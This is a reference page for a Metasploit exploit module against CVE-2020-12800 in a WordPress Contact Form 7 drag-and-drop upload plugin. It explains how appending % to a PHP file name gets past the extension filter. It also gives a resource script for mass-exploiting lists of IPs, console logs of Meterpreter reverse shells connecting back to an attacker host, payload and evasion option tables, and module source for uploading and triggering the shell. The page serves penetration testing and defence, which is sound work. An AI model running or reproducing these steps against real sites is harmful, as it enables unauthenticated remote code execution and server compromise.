Wordpress Drag and Drop Multi File Uploader RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/wp_dnd_mul_file_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Wordpress Drag and Drop Multi File Uploader RCE
Module: exploit/multi/http/wp_dnd_mul_file_rce
Source code: modules/exploits/multi/http/wp_dnd_mul_file_rce.rb
Disclosure date: 2020-05-11
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-12800

This module exploits a file upload feature of Drag and Drop Multi File Upload - Contact Form 7 for versions prior to 1.3.4. The allowed file extension list can be bypassed by appending a %, allowing for php shells to be uploaded. No authentication is required for exploitation.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Using wp_dnd_mul_file_rce against a single host

Normally, you can use exploit/multi/http/wp_dnd_mul_file_rce this way:

msf > use exploit/multi/http/wp_dnd_mul_file_rce
msf exploit(wp_dnd_mul_file_rce) > show targets
    ... a list of targets ...
msf exploit(wp_dnd_mul_file_rce) > set TARGET target-id
msf exploit(wp_dnd_mul_file_rce) > show options
    ... show and set options ...
msf exploit(wp_dnd_mul_file_rce) > exploit

Using wp_dnd_mul_file_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your wp_dnd_mul_file_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/wp_dnd_mul_file_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Drag and Drop Multiple File Upload - Contact Form 7 prior to version 1.3.4 contain a remote file upload functionality, but is bound by a file extension whitelist. However, this can be bypassed by appending % at the end of the file, so backdoor.php% will pass the filter. No authentication is required for exploitation.

At the time of writing this plugin has 20,000+ installs, and no mention of the vulnerability in the changelog.

Plugin can be downloaded from here.

php-mbstring is required for the plugin to work correctly, or else a 500 error will result in the server logs. No check is performed on plugin install for this.

Contact Form 7 is also a required plugin to be installed.

No additional steps are required for exploitation such as configuring the plugins, or adding a Contact Form (with drag and drop) to a page/post.

Verification Steps


  1. Install wordpress and the plugins
  2. Start msfconsole
  3. Do: use exploits/multi/http/wp_dnd_mul_file_rce
  4. Do: set rhosts
  5. Do: run
  6. You should get a shell.

Scenarios


Wordpress 5.4.1 with Drag and Drop Multiple File Upload - Contact Form 7 v1.3.3.2 and Contact Form 7 v5.1.9 on Ubuntu 20.04

resource (dnd.rb)> use exploits/multi/http/wp_dnd_mul_file_rce
resource (dnd.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (dnd.rb)> set verbose true
verbose => true
resource (dnd.rb)> check
[*] Checking /wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
[*] Found version 1.3.3.2 in the plugin
[*] 2.2.2.2:80 - The target appears to be vulnerable.
resource (dnd.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Getting nonce
[*] Nonce: 392e81074e
[*] Attempting payload upload
[+] Payload uploaded successful
[*] Attempting to trigger at well known location
[*] Sending stage (38288 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56032) at 2020-05-30 20:57:12 -0400
[+] Deleted ReasCENA.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-33-generic #37-Ubuntu SMP Thu May 21 12:53:59 UTC 2020 x86_64
Meterpreter : php/linux

Go back to menu.

Msfconsole Usage


Here is how the multi/http/wp_dnd_mul_file_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/wp_dnd_mul_file_rce

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_dnd_mul_file_rce) > show info

       Name: Wordpress Drag and Drop Multi File Uploader RCE
     Module: exploit/multi/http/wp_dnd_mul_file_rce
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-05-11

Provided by:
  h00die
  Austin Martin <[email protected]>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI of Wordpress
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a file upload feature of Drag and Drop Multi 
  File Upload - Contact Form 7 for versions prior to 1.3.4. The 
  allowed file extension list can be bypassed by appending a %, 
  allowing for php shells to be uploaded. No authentication is 
  required for exploitation.

References:
  https://www.exploit-db.com/exploits/48520
  https://nvd.nist.gov/vuln/detail/CVE-2020-12800
  https://github.com/amartinsec/CVE-2020-12800

Module Options


This is a complete list of options available in the multi/http/wp_dnd_mul_file_rce exploit:

msf6 exploit(multi/http/wp_dnd_mul_file_rce) > show options

Module options (exploit/multi/http/wp_dnd_mul_file_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of Wordpress
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the multi/http/wp_dnd_mul_file_rce exploit:

msf6 exploit(multi/http/wp_dnd_mul_file_rce) > show advanced

Module advanced options (exploit/multi/http/wp_dnd_mul_file_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WPCHECK                 true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                          yes       The name of the wp-content directory
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/wp_dnd_mul_file_rce module can exploit:

msf6 exploit(multi/http/wp_dnd_mul_file_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/wp_dnd_mul_file_rce exploit:

msf6 exploit(multi/http/wp_dnd_mul_file_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/wp_dnd_mul_file_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/wp_dnd_mul_file_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Server didnt respond when attempting to trigger payload


Here is a relevant code snippet related to the "Server didnt respond when attempting to trigger payload" error message:

62:	    print_status("Checking #{path}")
63:	    res = send_request_cgi(
64:	      'uri' => path
65:	    )
66:	    unless res
67:	      vprint_error('Server didnt respond when attempting to trigger payload')
68:	      return
69:	    end
70:	    if res.body.include? payload_name
71:	      print_good("Found payload: #{path}#{payload_name}")
72:	      @payload_location = "#{path}#{payload_name}"

Could not connect to the web service


Here is a relevant code snippet related to the "Could not connect to the web service" error message:

85:	
86:	  def check
87:	    begin
88:	      return check_plugin_version_from_readme('drag-and-drop-multiple-file-upload-contact-form-7', '1.3.4', '1')
89:	    rescue ::Rex::ConnectionError
90:	      vprint_error('Could not connect to the web service')
91:	      return CheckCode::Unknown
92:	    end
93:	    CheckCode::Safe
94:	  end
95:	

No server response


Here is a relevant code snippet related to the "No server response" error message:

97:	    vprint_status('Getting nonce')
98:	    res = send_request_cgi(
99:	      'uri' => normalize_uri(target_uri.path)
100:	    )
101:	    unless res
102:	      fail_with(Failure::Unreachable, 'No server response')
103:	    end
104:	
105:	    if res.code != 200
106:	      fail_with(Failure::UnexpectedReply, 'Non-200 response, check targeturi')
107:	    end

Non-200 response, check targeturi


Here is a relevant code snippet related to the "Non-200 response, check targeturi" error message:

101:	    unless res
102:	      fail_with(Failure::Unreachable, 'No server response')
103:	    end
104:	
105:	    if res.code != 200
106:	      fail_with(Failure::UnexpectedReply, 'Non-200 response, check targeturi')
107:	    end
108:	
109:	    /ajax_nonce":"(?<nonce>.{10})"/ =~ res.body
110:	    if nonce.nil?
111:	      fail_with(Failure::UnexpectedReply, 'Nonce not found')

Nonce not found


Here is a relevant code snippet related to the "Nonce not found" error message:

106:	      fail_with(Failure::UnexpectedReply, 'Non-200 response, check targeturi')
107:	    end
108:	
109:	    /ajax_nonce":"(?<nonce>.{10})"/ =~ res.body
110:	    if nonce.nil?
111:	      fail_with(Failure::UnexpectedReply, 'Nonce not found')
112:	    end
113:	    print_status("Nonce: #{nonce}")
114:	
115:	    payload_name = "#{rand_text_alphanumeric(6..12)}.php"
116:	

No server response


Here is a relevant code snippet related to the "No server response" error message:

133:	      'ctype' => "multipart/form-data; boundary=#{data.bound}",
134:	      'data' => data.to_s
135:	    )
136:	
137:	    unless res
138:	      fail_with(Failure::Unreachable, 'No server response')
139:	    end
140:	
141:	    if res.code == 403
142:	      fail_with(Failure::UnexpectedReply, '403 response, nonce detection failed')
143:	    elsif res.code == 500

403 response, nonce detection failed


Here is a relevant code snippet related to the "403 response, nonce detection failed" error message:

137:	    unless res
138:	      fail_with(Failure::Unreachable, 'No server response')
139:	    end
140:	
141:	    if res.code == 403
142:	      fail_with(Failure::UnexpectedReply, '403 response, nonce detection failed')
143:	    elsif res.code == 500
144:	      fail_with(Failure::UnexpectedReply, '500 response, server misconfigured, may need php-mbstring')
145:	    end
146:	    print_good('Payload uploaded successfully')
147:	    register_file_for_cleanup(payload_name)

500 response, server misconfigured, may need php-mbstring


Here is a relevant code snippet related to the "500 response, server misconfigured, may need php-mbstring" error message:

139:	    end
140:	
141:	    if res.code == 403
142:	      fail_with(Failure::UnexpectedReply, '403 response, nonce detection failed')
143:	    elsif res.code == 500
144:	      fail_with(Failure::UnexpectedReply, '500 response, server misconfigured, may need php-mbstring')
145:	    end
146:	    print_good('Payload uploaded successfully')
147:	    register_file_for_cleanup(payload_name)
148:	
149:	    # first we attempt to trigger the most obvious location of the payload.

No server response


Here is a relevant code snippet related to the "No server response" error message:

151:	    res = send_request_cgi(
152:	      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wp_dndcf7_uploads', 'wpcf7-files', payload_name)
153:	    )
154:	
155:	    unless session_created?
156:	      fail_with(Failure::Unreachable, 'No server response') unless res
157:	
158:	      # dont need to check for 200, since that would have triggered our payload
159:	      if res.code != 200
160:	        print_status('Bruteforcing for payload to trigger')
161:	        find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)

Unable to determine uploaded shell path


Here is a relevant code snippet related to the "Unable to determine uploaded shell path" error message:

158:	      # dont need to check for 200, since that would have triggered our payload
159:	      if res.code != 200
160:	        print_status('Bruteforcing for payload to trigger')
161:	        find_payload(normalize_uri(target_uri.path, 'wp-content', 'uploads', '/'), payload_name)
162:	        unless @payload_location
163:	          fail_with(Failure::Unknown, 'Unable to determine uploaded shell path')
164:	        end
165:	        # lastly, if we have a location found, trigger it
166:	        send_request_cgi('uri' => @payload_location)
167:	      end
168:	    end

Could not connect to the web service


Here is a relevant code snippet related to the "Could not connect to the web service" error message:

162:	        unless @payload_location
163:	          fail_with(Failure::Unknown, 'Unable to determine uploaded shell path')
164:	        end
165:	        # lastly, if we have a location found, trigger it
166:	        send_request_cgi('uri' => @payload_location)
167:	      end
168:	    end
169:	  rescue ::Rex::ConnectionError
170:	    fail_with(Failure::Unreachable, 'Could not connect to the web service')
171:	  end
172:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.